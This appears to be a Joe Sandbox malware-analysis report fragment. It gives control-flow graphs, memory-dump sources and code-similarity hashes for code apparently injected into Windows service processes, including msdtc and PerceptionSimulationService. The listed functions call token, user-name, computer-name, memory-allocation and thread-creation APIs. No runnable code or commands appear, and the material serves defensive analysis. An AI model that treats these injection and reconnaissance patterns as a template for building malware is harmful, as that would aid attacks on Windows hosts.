                                                                                                                                                                      control_flow_graph 434 d1599b-d1599e 435 d159f7 434->435 436 d159b8 call d30df0 434->436 438 d15a02 435->438 439 d159bd-d159c2 call d15d90 436->439 442 d159d4 438->442 443 d1597d 438->443 444 d159c7-d159ce 439->444 445 d159d8 442->445 446 d1593b-d15a15 call d311a0 442->446 443->442 447 d1597f-d15981 443->447 448 d159d0 444->448 449 d15a1a-d15a26 444->449 452 d159d9-d159de call d42190 445->452 451 d15983-d15a38 447->451 448->449 453 d159d2-d159de 448->453 455 d159a1-d159b5 call d15e10 449->455 456 d15a2c-d15a34 449->456 461 d15994-d1599c 451->461 462 d15a3e 451->462 452->461 468 d159e0 452->468 453->461 453->468 455->436 467 d15a08-d15a0b 455->467 456->452 461->438 463 d1599e 461->463 462->456 463->435 467->461 469 d15a0d 467->469 468->461 470 d159e2-d159ec 468->470 477 d15991 469->477 478 d15932 469->478 472 d15a62-d15a6e 470->472 473 d159ee-d159ef 470->473 474 d15a70 472->474 475 d15a75-d15ab3 call d31280 472->475 473->451 476 d159f1 call d49970 473->476 474->475 479 d15a72 474->479 488 d15ab5 475->488 489 d15abb-d15ac9 475->489 476->436 477->478 482 d15993 477->482 479->475 482->461 488->489 490 d15ab7-d15ab9 488->490 491 d15af2-d15af5 489->491 490->489 495 d15ad5 491->495 496 d15adb-d15adc 491->496 495->496 497 d15ad7-d15ad9 495->497 498 d15ae2 496->498 499 d15a45-d15a46 496->499 497->496 498->499 500 d15ae8 498->500 500->491
APIs
Memory Dump Source
• Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: dbe6dc8b53a1c8ce73a8baddd9ba02cf02c8450d2af8fd7095abc9a74a299452
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 8C01A26164DE80FFD6569A1870512F96592FBD9320F2C0596A08ACB09EDD2C99C09F73

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: b6eaa31116e102f82f926e518120e1014d7e8461ebb034030a7b4b815515f449
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 01C08CA332CF02B6523883587C0F0F026208303762B0C000AAC4280220DE04CEC330B7

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: c33d68779d3da6df1532d2a92ec7ae283d24a09c954146e03abe98fb69a1a7c2
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: 9EC092E3658B09B75138A7A9BC0E0F135604713B62F0C4512FC068A360DE588DC371B2

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 97.3%
Signature Coverage: 0%
Total number of Nodes: 75
Total number of Limit Nodes: 5

Control-flow Graph
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 005553C4
Memory Dump Source
• Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: a19e88ae820cd11d5020602164a4ea8ddf3b847c10d95e97f0139264fee668ba
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 4541B66540DE958FDB264A6444743747FA0BB113E3F9A0CE7DC8A8A1E2F1985C8D9326

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction ID: 3c520f8fee02408287fec705a2d091c54743883fa2fc19a9b9c1a37ce60ab265
• Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction Fuzzy Hash: 6CD11831418B09CBCB24EF58EC497EABBD1FB90310F589A1FD84AC31A5DA74D645D6C2

Control-flow Graph
Memory Dump Source
• Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction ID: d2b67ccaef53287bce69da2dd3a4e4d1f1d5d243386a0260e9a1d4bf18d2358b
• Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction Fuzzy Hash: 4E61FE3460CE459FC7658B2888382357EA0FB55353F680A5BEC47E31A0DF249C4DD752

Control-flow Graph
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 2dd7c21ffa7714e6844fd14691ff67a7b1982013f85ead3638705f0821c27294
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F1393071CE494FC769A72C686527A7FE2F7D9310F58859BD44EC3296DD289C0AD382

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 333 555b42-555b47 call 555d90 335 555b4c-555b52 333->335 337 555c42-555c62 call 571280 335->337 338 555b0d 335->338 353 555c14-555cc0 337->353 354 555c26 337->354 338->337 339 555b13 338->339 341 555c8f-555c96 339->341 343 555c29 341->343 344 555c98-555c9a 341->344 346 555cc2-555cc9 call 5552a0 343->346 347 555c2f-555c36 343->347 345 555c9c 344->345 356 555d0e-555d18 345->356 357 555bfa 345->357 362 555c69 346->362 363 555ccb 346->363 347->346 351 555c3c 347->351 351->333 353->346 354->353 361 555c28 354->361 358 555d54 356->358 359 555d1a 356->359 357->356 364 555c00 357->364 367 555d4b-555d52 359->367 361->343 365 555c6f 362->365 366 555b68-555d75 362->366 363->345 368 555ccd 363->368 364->353 365->366 369 555c75 365->369 367->358 370 555d45-555d47 367->370 368->345 371 555ccf-555ce4 CreateThread 368->371 369->341 374 555d5f 370->374 375 555d49 370->375 376 555c01-555c05 371->376 377 555cea 371->377 379 555d65 374->379 375->367 375->374 381 555c20-555c68 376->381 384 555d37-555d41 376->384 377->376 380 555cf0-555cf6 377->380 379->379 380->381 384->367 385 555d43 384->385 385->358
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: e98fedac3669f3bacdb2b025bf33f7699b98b34fbec8ad24cd2df992d53f9fa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: EF21BC3120CF458FCB6A9B18847C7742EE1BB94363F6809A79C47CF1A2FA649D4C9312

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 386 555b09-555d01 391 555bb4-555ce4 CreateThread 386->391 392 555d07 386->392 399 555c01-555c05 391->399 400 555cea 391->400 392->391 394 555d0d 392->394 396 555d37-555d41 394->396 397 555d43 396->397 398 555d4b-555d52 396->398 403 555d54 397->403 402 555d45-555d47 398->402 398->403 399->396 405 555c20-555c68 399->405 400->399 404 555cf0-555cf6 400->404 406 555d5f 402->406 407 555d49 402->407 404->405 410 555d65 406->410 407->398 407->406 410->410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 8f6c29b8ec0e57f47b7e52ac4218af89e0a6a4365c3e6bcff3dd437489af9907
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: BC01923150DF868FDB5656248C393797FA0BB50337F6509AB8C87CA0A1FAA54E0CA712

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 411 555b87-555b99 CreateThread 412 555b1c-555b3b 411->412 413 555cff-555d01 411->413 412->413 414 555bb4-555ce4 CreateThread 413->414 415 555d07 413->415 423 555c01-555c05 414->423 424 555cea 414->424 415->414 417 555d0d 415->417 420 555d37-555d41 417->420 421 555d43 420->421 422 555d4b-555d52 420->422 427 555d54 421->427 426 555d45-555d47 422->426 422->427 423->420 429 555c20-555c68 423->429 424->423 428 555cf0-555cf6 424->428 430 555d5f 426->430 431 555d49 426->431 428->429 434 555d65 430->434 431->422 431->430 434->434
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: cc78e9fc544a56d08db6f684efccd869178b29dcb8a349e34b04668ca805b02a
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE04F3060DB444FDB5A9B2458343197EA5BB88321F1545CBC84AD7191EB69090A4792

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 435 55599b-55599e 436 5559f7 435->436 437 5559b8 call 570df0 435->437 438 555a02 436->438 441 5559bd-5559c2 call 555d90 437->441 443 5559d4-555a15 call 5711a0 438->443 444 55597d 438->444 445 5559c7-5559ce 441->445 444->443 446 55597f-555981 444->446 448 5559d0 445->448 449 555a1a-555a26 call 555e10 445->449 450 555983-555a38 446->450 448->449 452 5559d2 448->452 456 555994-55599c 449->456 465 555a0d 449->465 450->456 457 555a3e call 582190 450->457 452->443 456->438 460 55599e 456->460 457->456 471 5559e0 457->471 460->436 469 555991 465->469 470 555932 465->470 469->470 472 555993 469->472 474 5559e4-5559ec call 5821ac 470->474 471->456 473 5559e2 471->473 472->456 473->474 477 555a62-555a6e 474->477 478 5559ed 474->478 480 555a75-555ab3 call 571280 477->480 481 555a70 477->481 478->450 479 5559ee-5559ef 478->479 479->450 482 5559f1 call 589970 479->482 491 555ab5 480->491 492 555abb-555ac9 480->492 481->480 483 555a72 481->483 482->437 483->480 491->492 493 555ab7-555ab9 491->493 494 555af2-555af5 492->494 493->492 497 555ad5 494->497 498 555adb-555adc 494->498 497->498 499 555ad7-555ad9 497->499 500 555a45-555a46 498->500 501 555ae2 498->501 499->498 501->500 502 555ae8 501->502 502->494
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 95444e6c9290c8ff350e0c7071b4d8ed4dba8bca50f27d419fa6934e0e3f310f
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01A2B091DF81CFD656AA1884792796DB1BB94327F6849979C4ACB092F92C4D0CD341

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
control_flow_graph 503 558090-558096 504 558184 503->504 505 55813c-5581a5 503->505 506 558186 CloseHandle 504->506 507 55818c-558192 504->507 517 5581a7 505->517 518 5581bd-5581ca 505->518 506->507 509 558115-558118 507->509 510 558194 507->510 512 5580a7 509->512 513 558119-55811a 509->513 510->509 514 55819a 510->514 513->512 516 55811c 513->516 514->505 519 55820f 516->519 524 5581d0 518->524 525 5580f3 518->525 520 558215-55821e 519->520 521 55808e-558096 519->521 520->521 528 558224 520->528 521->504 535 5580c3 524->535 536 5581fe-558201 GetTokenInformation 524->536 526 5580f5 525->526 527 55808c 525->527 526->527 538 558077 526->538 527->521 532 5581d7-5581e6 call 58715c 528->532 533 558226 528->533 534 558228-5582ee call 555d90 533->534 560 5582f0 534->560 561 55830c-558320 call 555d90 call 55ec00 534->561 535->536 540 5580c9 535->540 536->519 547 5581b7 536->547 538->532 540->544 544 5580ca-55810f GetTokenInformation 532->544 555 558089 532->555 533->532 552 558111 544->552 553 55812d 544->553 547->519 551 5581b9-5581bb 547->551 551->518 552->553 557 558113 552->557 558 558133-5581f0 553->558 559 5580a8 553->559 555->544 556 55808b 555->556 556->527 557->509 570 5581f6 558->570 571 5580da-5580f1 558->571 563 5580aa-5580ad 559->563 560->561 562 5582f2 560->562 566 5582f7-5582fc call 555d90 561->566 590 558322 561->590 562->566 568 558163-558170 call 587164 563->568 569 5580b3-558203 563->569 582 558253-558265 call 571280 566->582 583 558302 566->583 568->506 584 558172 568->584 569->568 577 558209 569->577 570->571 576 5581fc 570->576 571->563 576->536 592 558328 582->592 593 55826b 582->593 583->582 587 558308-55830a 583->587 584->507 587->561 590->566 594 558324-558326 590->594 598 558335 592->598 599 5582df-55832b 592->599 593->592 597 55823f-558243 593->597 594->592 597->566 602 558287 598->602 603 55829b-55829d 598->603 599->598 604 55832d-558331 599->604 602->603 606 55824e-558252 602->606 604->598 606->582
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 4f798f558f163d2741895c63f4acba36b27e20878f1513dd5ccd62ed3c39f437
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 67C04C61529D4696567906481C3F0B42E50B702793B1C48579C16A1220DD559E4BD797

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
control_flow_graph 607 55817f 608 558184 607->608 609 558186 CloseHandle 608->609 610 55818c-558192 608->610 609->610 611 558115-558118 610->611 612 558194 610->612 613 5580a7 611->613 614 558119-55811a 611->614 612->611 615 55819a-5581a5 612->615 614->613 616 55811c 614->616 625 5581a7 615->625 626 5581bd-5581ca 615->626 618 55820f 616->618 620 558215-55821e 618->620 621 55808e-558096 618->621 620->621 627 558224 620->627 621->608 633 5581d0 626->633 634 5580f3 626->634 628 5581d7-5581e6 call 58715c 627->628 629 558226 627->629 650 558089 628->650 651 5580ca-55810f GetTokenInformation 628->651 629->628 631 558228-5582ee call 555d90 629->631 656 5582f0 631->656 657 55830c-558320 call 555d90 call 55ec00 631->657 646 5580c3 633->646 647 5581fe-558201 GetTokenInformation 633->647 637 5580f5 634->637 638 55808c 634->638 637->638 648 558077 637->648 638->621 646->647 653 5580c9 646->653 647->618 664 5581b7 647->664 648->628 650->651 652 55808b 650->652 659 558111 651->659 660 55812d 651->660 652->638 653->651 656->657 658 5582f2 656->658 663 5582f7-5582fc call 555d90 657->663 693 558322 657->693 658->663 659->660 665 558113 659->665 667 558133-5581f0 660->667 668 5580a8 660->668 680 558253-558265 call 571280 663->680 681 558302 663->681 664->618 670 5581b9-5581bb 664->670 665->611 678 5581f6 667->678 679 5580da-5580f1 667->679 671 5580aa-5580ad 668->671 670->626 675 558163-558170 call 587164 671->675 676 5580b3-558203 671->676 675->609 692 558172 675->692 676->675 686 558209 676->686 678->679 685 5581fc 678->685 679->671 695 558328 680->695 696 55826b 680->696 681->680 687 558308-55830a 681->687 685->647 687->657 692->610 693->663 698 558324-558326 693->698 702 558335 695->702 703 5582df-55832b 695->703 696->695 701 55823f-558243 696->701 698->695 701->663 706 558287 702->706 707 55829b-55829d 702->707 703->702 708 55832d-558331 703->708 706->707 710 55824e-558252 706->710 708->702 710->680
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 6cad248b4c347d916ac764968d84c464383347c0c825e8e2f82becda7aceba15
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: CBC092A0958D0987513826882C2E0B13D9077137A3F1C8823EC16BB360DD686D8BC7A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.9%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:94
                                                                                                                                                                      Total number of Limit Nodes:10
execution_graph 5391 b181b1 5395 b18075 5391->5395 5392 b18186 CloseHandle 5392->5395 5393 b181ad GetTokenInformation 5393->5395 5394 b180ca GetTokenInformation 5394->5395 5395->5392 5395->5393 5395->5394 5396 b180a7 5395->5396 5456 b18090 5458 b18075 5456->5458 5457 b18186 CloseHandle 5457->5458 5458->5457 5459 b180ca GetTokenInformation 5458->5459 5460 b180a7 5458->5460 5461 b181ad GetTokenInformation 5458->5461 5459->5458 5461->5458 5477 b157f0 5480 b155ac 5477->5480 5478 b155e4 5480->5477 5480->5478 5481 b33870 5480->5481 5482 b33876 5481->5482 5484 b33893 5482->5484 5485 b33720 5482->5485 5484->5480 5487 b20c42 5485->5487 5486 b1e050 VirtualAlloc 5486->5487 5487->5485 5487->5486 5488 b337dd 5487->5488 5488->5484 5488->5488 5462 b152f4 5465 b152cb 5462->5465 5463 b152b0 5464 b153c4 GetSystemDefaultLangID 5464->5463 5465->5463 5465->5464 5451 b152b7 5452 b152b0 5451->5452 5453 b152c4 5451->5453 5453->5452 5454 b153c4 GetSystemDefaultLangID 5453->5454 5455 b15475 5454->5455 5397 b15b00 5398 b15bba 5397->5398 5405 b252c0 5398->5405 5400 b15bc7 5404 b15bde 5400->5404 5410 b30080 5400->5410 5406 b252c6 5405->5406 5407 b252ce 5405->5407 5406->5407 5424 b1e050 5406->5424 5407->5400 5416 b30089 5410->5416 5411 b303e0 GetComputerNameW 5411->5416 5412 b30181 VirtualFree 5412->5416 5413 b1e050 VirtualAlloc 5413->5416 5414 b303bf GetUserNameW 5414->5416 5415 b304d6 GetComputerNameW 5415->5416 5416->5411 5416->5412 5416->5413 5416->5414 5416->5415 5417 b15c7b 5416->5417 5418 b18070 5417->5418 5421 b18075 5418->5421 5419 b18186 CloseHandle 5419->5421 5420 b180a7 5420->5404 5421->5419 5421->5420 5422 b181ad GetTokenInformation 5421->5422 5423 b180ca GetTokenInformation 5421->5423 5422->5421 5423->5421 5425 b1e0c3 5424->5425 5426 b1e0d8 VirtualAlloc 5426->5425 5466 b15860 5467 b252c0 VirtualAlloc 5466->5467 5468 b15869 5467->5468 5469 b30080 5 API calls 5468->5469 5470 b1587d 5469->5470 5471 b18070 3 API calls 5470->5471 5472 b15870 5471->5472 5427 b15b42 5428 b15b07 5427->5428 5428->5427 5430 b15b68 5428->5430 5432 b15bb4 5428->5432 5433 b152a0 5428->5433 5431 b15cdf CreateThread 5431->5430 5431->5432 5437 b154a0 5431->5437 5432->5430 5432->5431 5436 b152ab 5433->5436 5434 b153c4 GetSystemDefaultLangID 5435 b152b0 5434->5435 5435->5428 5436->5434 5436->5435 5438 b154b5 5437->5438 5444 b15b87 CreateThread 5445 b15b1c 5444->5445 5449 b15810 5444->5449 5446 b15cdf CreateThread 5445->5446 5447 b15c01 5445->5447 5446->5445 5446->5447 5448 b154a0 5446->5448 5450 b15822 5449->5450 5524 b15347 5525 b152cb 5524->5525 5526 b153c4 GetSystemDefaultLangID 5525->5526 5528 b152b0 5525->5528 5527 b15475 5526->5527 5499 b15b09 5500 b15b16 5499->5500 5501 b15c01 5500->5501 5502 b15cdf CreateThread 5500->5502 5502->5500 5502->5501 5503 b154a0 5502->5503 5489 b155ef 5492 b155ac 5489->5492 5490 b33870 VirtualAlloc 5490->5492 5491 b155e4 5492->5490 5492->5491

Control-flow Graph: function b152a0 (graph rendering omitted; API call in graph: GetSystemDefaultLangID)
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00B153C4
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 567ab531e36b06aaf6cef039aa4213df7661d0fa140291a587d6d1c06bfb28b7
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 0241B46241DE95CFD73A422468A42F07BE0DB923A2FDD04E7D4E3C71E6D1A85CC1936A

Control-flow Graph: function b30080 (graph rendering omitted; API calls in graph: GetComputerNameW, GetUserNameW, VirtualFree)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: a482213db9b2e0bc4c833df859b9567399ecd68b110d06e34e977a844067b0ba
• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: 11D10531428F0D8BC728FF58D8957EAB7E1FFA0310F28469EE846C3264DA74964587C2

Control-flow Graph: function b18070 (graph rendering omitted; API calls in graph: CloseHandle, GetTokenInformation)
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction ID: 6d3d69c43a76cbb79b0be27f1c16ccdbfc1cc12a734981460f18c74c0f171446
• Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction Fuzzy Hash: FD61473250CA49AFC7668B2898987F57BE1FB5D350FE802DAE446D31A0DF344CD58392

Control-flow Graph: function b15910 (graph rendering omitted; no direct API calls in graph)
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: c86623dd15e431b7f1518f9efa52e135d17aa7f9559817b9a01ef62bbd585fbb
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: 24F10A3171CE58CFC769A71C68816BA77D2EBD9310FA846DED04EC3297DD249C468382

Control-flow Graph: function b15b42 (graph rendering omitted; API call in graph: CreateThread)
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: 3e14b0f22196b1c74b942db9a03c67b504654d692119eaac2bd060765f9568b5
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: 5721AE3020CF45CFCB799F189898BF56AE1EBD5310FE801E68447CF2A6CA249CC49396

Control-flow Graph: function b15b09 (graph rendering omitted; API call in graph: CreateThread)
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID:
